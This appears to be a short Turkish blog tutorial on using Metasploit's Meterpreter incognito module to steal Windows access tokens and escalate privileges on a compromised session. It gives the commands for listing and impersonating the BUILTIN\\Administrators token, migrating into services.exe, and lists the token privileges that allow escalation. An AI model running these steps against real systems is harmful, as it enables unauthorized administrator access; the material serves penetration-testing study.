Meterpreter Incognito Modulü

Elde ettiğimiz oturum üzerinde yetki yükseltmeye yarayan incognito modulünden bahsedeceğim. Tokenlar aynı web cookilerine benzer. Geçici olarak bu tokenlar bizlere system ve ağlara kullanıcı adı ve şifre sunmadan her zaman erişmemize sağlar. Incognito exploit de tokenları çalar.

İki tip token vardır. Bunlar ;

Delegate tokenlar interactive’dir. Makinede oturum açmak ya da uzaktan oturum açmak gibi durumlardır.

Impersonate tokenlar non-interactive’dir. Ağ sürücüsünde ve ya domain’de oturum açmak gibi durumlardır.

Şimdi incognito modulünü meterpreter ile kullanalım

use incognito
Elde ettiğimiz kullanıcı için kullanabilir tokenları listeleyelim
list_tokens -g
Tokenlara baktığımızda gözümüze BUILTIN\Administrators çarpıyor. Şimdi bu tokeni çalalım.
impersonate_token BUILTIN\\Administrators

Aslında her şey iyi gözüküyor. Bir eksiğimiz daha var. Bunun için öneri gereği serivices.exe’ye migrate uygulamak.

ps 

Tüm processler listelenir.

migrate PID ile geçiş yapılır.
migrate 668

whoami 🙂

Ek bilgiler:

whoami /priv

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

komut çıktısından sonra yukarıdakilerin state(durumlarında) enable görürsek yetki yükseltme yapabiliriz.(düşük yetkili kullanıcı için söylüyorum)

Daha fazla bilgi için: https://www.offensive-security.com/metasploit-unleashed/fun-incognito/

Leave a Reply

Your email address will not be published.